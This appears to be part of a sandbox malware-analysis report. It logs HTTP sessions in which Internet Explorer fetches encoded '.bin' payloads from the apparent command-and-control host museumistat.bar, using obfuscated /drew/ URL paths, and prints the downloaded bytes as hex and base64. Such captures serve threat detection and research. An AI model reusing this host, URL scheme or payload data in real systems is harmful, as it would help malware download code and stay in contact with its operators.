
                  Jan 19, 2022 11:50:37.431406021 CET3159OUTGET /drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:37.757834911 CET3161INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfdaae1b.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76
                  Data Ascii: Si70EpXF3DtKETRp+ZGY2TxEJmAt3QotOI6e8niT0CEQwmUK9nwSKIDm8Yy3IXHuqSjJe6XmHNyDM+rf9QnSxJFKIP9tRRsokIExMFQpCOU8UJd91M1SjTfbliEK+hAzl7BjZ20WBpIP+SmwVpi1gbrUKPBRVPodw7DZ5lbLzKoHTe4ZTvBlSBpujTEuMr/D0D89jMmzJpbhDHWepb5xcuxZrKZeQG3CJmAn5JiS8ic3fttpjjIJ3YpsakEuFQYlNxhB+2IbF/qNswI/IdzlWRFBbTMzGf1bNy6v1Ky4QV6eJwNjsllL09iPkx0RvY7udz310UzfzmhFLeFAY7ytl75zYHlTUi+0OnLWEc8Fusanm+WFsyVVDYuhfbZiJcnDKW1CTja8I7SqvQ5RYMFGChmK4XG+cn8vdvwGw9Q2a7iMywG2gVilGcs2+flECgVRbDNgo/06m3NBtsTEBtcdILFI/0kRN8LXvqZJe+eL9ZaX/Z5mGwUE++jvEQOdmq4Gq3dmIsBWyErPbY0LzVyoEyIAQBt8g+rszllaX8i24EUIDitZIAHCMpx3VUSuvkjaC//uzCeSjl6fxKg0pUbcNoTRDgg8B5XeP8xiKZ6RDobn5e3U+XiEImRVJexoUceFIr0in/B5b0j9bujna40rxWP9jK7Wh0eVSEz0RVAC4jF2T7uM8A4YLhpWY5V3LM7NGvoaAop5MEkr7SWC9MiEB1CJHc2WKnv7u7i/SMRwurjov4MWyMFps/sb0+Hnz7G6Aa4H2ge34iz46NCKCjMQrs8ruUJnpTY2JtVHsDh9g+t2GxU7nE/ydYijptGP4Y3gRvZNZRVFqjyFE7Hqq9lReXJMOshq33G/s9Pg7f1LqSkj61TBO8oGX81Eihxi0QwspqAO1fG5bhTCEIaW0SpCgC5jHaAEIdVeAUU2DoR7ZrfuATlmB/JgR8+lzUQudymr5SyRANWJZVfs211sXoAVXEBkvIw6d750suUGv
                  Jan 19, 2022 11:50:42.294394016 CET3515OUTGET /drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:42.620764971 CET3517INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:42 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ed0289129.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76
                  Data Ascii: Si70EpXF3DtKETRp+ZGY2TxEJmAt3QotOI6e8niT0CEQwmUK9nwSKIDm8Yy3IXHuqSjJe6XmHNyDM+rf9QnSxJFKIP9tRRsokIExMFQpCOU8UJd91M1SjTfbliEK+hAzl7BjZ20WBpIP+SmwVpi1gbrUKPBRVPodw7DZ5lbLzKoHTe4ZTvBlSBpujTEuMr/D0D89jMmzJpbhDHWepb5xcuxZrKZeQG3CJmAn5JiS8ic3fttpjjIJ3YpsakEuFQYlNxhB+2IbF/qNswI/IdzlWRFBbTMzGf1bNy6v1Ky4QV6eJwNjsllL09iPkx0RvY7udz310UzfzmhFLeFAY7ytl75zYHlTUi+0OnLWEc8Fusanm+WFsyVVDYuhfbZiJcnDKW1CTja8I7SqvQ5RYMFGChmK4XG+cn8vdvwGw9Q2a7iMywG2gVilGcs2+flECgVRbDNgo/06m3NBtsTEBtcdILFI/0kRN8LXvqZJe+eL9ZaX/Z5mGwUE++jvEQOdmq4Gq3dmIsBWyErPbY0LzVyoEyIAQBt8g+rszllaX8i24EUIDitZIAHCMpx3VUSuvkjaC//uzCeSjl6fxKg0pUbcNoTRDgg8B5XeP8xiKZ6RDobn5e3U+XiEImRVJexoUceFIr0in/B5b0j9bujna40rxWP9jK7Wh0eVSEz0RVAC4jF2T7uM8A4YLhpWY5V3LM7NGvoaAop5MEkr7SWC9MiEB1CJHc2WKnv7u7i/SMRwurjov4MWyMFps/sb0+Hnz7G6Aa4H2ge34iz46NCKCjMQrs8ruUJnpTY2JtVHsDh9g+t2GxU7nE/ydYijptGP4Y3gRvZNZRVFqjyFE7Hqq9lReXJMOshq33G/s9Pg7f1LqSkj61TBO8oGX81Eihxi0QwspqAO1fG5bhTCEIaW0SpCgC5jHaAEIdVeAUU2DoR7ZrfuATlmB/JgR8+lzUQudymr5SyRANWJZVfs211sXoAVXEBkvIw6d750suUGv


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.34975631.41.44.380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 19, 2022 11:50:36.361098051 CET2893OUTGET /drew/ml7QN9H69bQc_2FqcErn/JWHN_2F1D_2FeQ7F2rf/oeEjPxzB_2Fw_2F8MEJzC6/5gAnzEpRNXWFk/64j4iITJ/jnOThCTb9WelDC2Av_2F9i8/VHepa0UCDh/KFl9Z1ZbYspbJ4E8_/2BzgcxaTppah/d9hJDFKgAt8/5U8WBthgJgfyxM/8RFDoFNHkI_2FZphi7QxP/YaWR2kATqPAKO_2B/PJwm2MPaqbbSQg_/2BLvMKsgjJPPYLJl45/I0CzZhv6_2FCZxS/FG1.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:36.689474106 CET2895INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:36 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfc9b07f.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Data Ascii: QYGZYy9HW/sN5QjdBAunTNqtusm2LCTN3LeRISeyxnHtg10njnRiHx8Lige7+zQL2W8e9auCaJApdA+C4VR18j78cZ2mPeOYuvaQD5Rg6TM3AAttXdZtdbBB6ykmO0wuGjuBY9lGE+pJEtVtE8LkVrWYv4mxg1BQNWYrloxcwiT2+7d+tyYXiovpUoSoLQTL+f2EybjX1E3rMe4T6F+RBJPUWv1P1JJfpPc/Ar26H4/fMieoldaEeE6OZayeaJ9eIxNDO7D7c/Rw/g0rtJZBd57H8snQVT45kCetLQhJIN3o/szkANEUB6aIPhQsBNjRcYyLc133q0yzEoykyofrTrTQ4QoHT921OhdI7N0qIezbwCfqT8VFcC23YjXZ7ZVUFZuIIl90Y9KuyvS65u6XgzNQt5HMGOFYpmflOifh+IzAMrT03IqTCPdOhWEpjbkJc5kKuUQsQlaRoU36IAV3ohBn1ImIFY2leqR5TlQ9ZOHaEHa6QNgnEG6xbnNJ2+UY7JiDiQjBZrCb7+GhxnZSFhtfAcMU2XcGwwV2uJoIxt7vL8F9TlhRMmA/RzR6Vt8xZf9RkR3e1p9toFZ3o4cHYUv3InWCqPsBnojH8xEM0VbjheBXoaxhBQ9Z6/fxn/2HcXrb1c8ib6luEKnWdCL6uzlHzcBkMaODD0YZcpkiWs/6sgYIaF3dYoRZQYDURN6vLzBtXtZMBaUWrohQdTdn4uzJjcnwBLnvPyO+TFuCNjXMiT2Gy/j/Hp3lWXfRHojjehpOcJapWiupnadbquxGn60XhlEawJcb0p9styzM6ocaCAdtOVtvHH7NeRQts+hJ5GP80Vv1Zc/Xr3lUljO1dutyvj7rudr6gji9V1Ej152ueQwUA3hjCMdpGGxrnWcxqPTtIqSG6QVV8puZPSV5K8uDFCS1Q/JcE+vlsTRPtICHru4D8KN/gNfmLY6KlY0w/uUa5aHEjhaDlVbo+Nz0QVn+HE/mL7or7gD
                  Jan 19, 2022 11:50:39.179826021 CET3171OUTGET /drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:39.507076979 CET3173INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecff6e9a1.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
